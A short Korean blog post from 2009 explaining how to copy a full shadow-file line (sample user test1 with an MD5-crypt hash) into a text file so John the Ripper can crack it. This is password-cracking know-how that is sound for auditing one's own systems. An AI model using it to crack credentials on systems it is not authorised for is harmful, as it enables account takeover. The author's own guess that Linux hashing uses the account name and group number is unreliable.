아무튼, test1을 크랙하고 싶다면, 그 해당 줄을 모두 복사합니다.
암호화된 부분만 가져오시면 안됩니다. (john the ripper는 있어야 함)
개인적인 생각에는 리눅스 시스템 암호화는 계정의 문자열과 그룹 번호 등등을 모두 이용하여 암호화 할지도 모른다는 생각이 드네요.
저두 암호화 쪽은 잘 몰라서 대강 그런 생각이 듭니다.
참고로, mysql 같은 경우에는 계정 문자열과는 상관없이 암호화 합니다.

아무튼, 이를 복사하여 일반 txt 파일로 저장 하면 됩니다.

예) pass.txt
내용 :
test1:$1$dxH.pxpU$CpTS86RilpP5xo4igbv88/:12818:0:99991:77:::

이렇게 저장하면 john the ripper가 crack 할수 있습니다.
2009/06/18 17:24 2009/06/18 17:24